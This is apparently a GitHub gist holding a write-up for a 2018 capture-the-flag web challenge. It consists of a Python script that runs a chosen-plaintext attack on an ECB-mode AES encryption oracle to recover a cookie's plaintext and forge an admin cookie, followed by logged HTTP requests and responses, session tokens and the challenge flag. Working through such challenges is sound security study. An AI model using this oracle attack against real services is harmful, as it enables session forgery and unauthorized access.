@pich4ya
Last active February 11, 2018 16:14
https://evlzctf.in/challenges#Monster EvlzCTF 2018 - web 200 writeup
import urllib,urllib2,cookielib
import requests
import re
import json,string
# Chosen plaintext attack on AES by Bongtrop Inw Za 007
def register(uname):
    """Create an account named *uname* and return its base64-decoded 'test' cookie.

    The registration form is fetched first so the hidden CSRF token can be
    scraped and echoed back with the form post. The index page is then
    requested before the cookie is read (presumably that is where the server
    sets it -- inferred from the request order, not verified here).

    Raises AttributeError if the CSRF token is not found in the form page.
    """
    sess = requests.Session()
    form_page = sess.get('http://35.200.197.38:8014/register')
    token_match = re.search(r'name="csrf_token" type="hidden" value="(.+?)">', form_page.content)
    form = {
        "csrf_token": token_match.group(1),
        "username": uname,
        "password": "longcatz1",
    }
    sess.post('http://35.200.197.38:8014/register', data=form)
    sess.get('http://35.200.197.38:8014/')
    # Cookie value is base64 text (see the transcript notes below); decode it.
    return sess.cookies['test'].decode('base64')
def encrypt(plaintext):
    """Return the hex ciphertext the server produces for *plaintext*.

    *plaintext* is appended to the query string unchanged, so any
    URL-encoding has to be done by the caller.
    """
    url = 'http://35.200.197.38:8014/encryptcookie?plaintext=' + plaintext
    reply = requests.get(url)
    body = json.loads(reply.content)
    return body['ciphertext']
flag=''
# Recover the cookie plaintext one character per outer iteration.
# x shrinks by one each round while flag grows by one, so
# dataUser + flag + i always totals 16 characters (one AES block);
# the returned one-block ciphertext is then looked up inside the
# decoded cookie with a plain substring test.
for x in xrange(15,-1,-1):
    dataUser = x*"G"
    # Fresh account per round: the user name supplies the padding.
    testCookie = register(dataUser)
    print dataUser
    print testCookie
    for i in string.printable:
        # Only the candidate character is URL-quoted; characters already
        # in `flag` are sent raw (see encrypt(), which does no quoting).
        xxx=dataUser+flag+urllib.quote(i)
        encrypted = encrypt(xxx)
        print xxx,encrypted
        if encrypted in testCookie:
            print flag
            flag+=i
            break
        pass
print flag
# 1.) http://35.200.197.38:8014/sitemap.xml > /encryptcookie?plaintext=
# 2.) register user = RRRRRRRRRRR > get token > 5b6c570de94f09c669d89b8987824926
# run script
# RRRRRRRRRRR:00 5c210c34a6103e2e73eef74573b6477f
# RRRRRRRRRRR:01 1d12dd35304456e58e55bfb70f485575
# RRRRRRRRRRR:02 b42afdee10b47245c095d7f42cb4a0bf
# GET /encryptcookie?plaintext=RRRRRRRRRRR:1 HTTP/1.1
# Host: 35.200.197.38:8014
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: test=NmYyNTUwZTRjYzVlNjhmOWVjYTFjM2Q1Y2IxMzhmYjE=; remember_token=admin|3a73995233e842ef5f531d63f1d2f48d7e27063d2fc234577585166942b49b9290c9dc2121e57d423a7f55e29e156381bc781f23b79aff97bd59cd172a0296ca; session=.eJwlj8tqAzEMAP_F5xxWT1v5mUW2JBpKU9hNTqX_3oXOfWDmp-115PnR7q_jnbe2P6LdGxlHSllNm66KBmBLBPsCXEgC6FkiqjQucM2NgU1wCA8MmyoBY9LyDp2Z1Lhy69rJ2Yxq9FwaoRNY0rZKzIIe4XOF82W2W1vnUfvr-zOfV48sHFpXSw3oxCO8KKZPg8FSulFHc2S5vPeZx_-Ex9fj2X7_APfeP9k.DWF3jg.ZifzFK0gyVRQEvWBHkGSir8XQmc
# Connection: close
# HTTP/1.1 200 OK
# Server: gunicorn/19.7.1
# Date: Sun, 11 Feb 2018 08:10:14 GMT
# Connection: close
# Content-Type: application/json
# Cache-Control: public, max-age=0
# Pragma: no-cache
# Expires: 0
# Content-Length: 55
# {
# "ciphertext": "1735ec0a1ffa9dc0d5950f7bc02bbb3d"
# }
# 1735ec0a1ffa9dc0d5950f7bc02bbb3d > b64 > MTczNWVjMGExZmZhOWRjMGQ1OTUwZjdiYzAyYmJiM2Q=
# GET /admin HTTP/1.1
# Host: 35.200.197.38:8014
# Cache-Control: max-age=0
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
# Referer: http://35.200.197.38:8014/login
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: test=MTczNWVjMGExZmZhOWRjMGQ1OTUwZjdiYzAyYmJiM2Q=;
# <center><h1>evlz{aes_des_xor_hex}ctf</h1></center>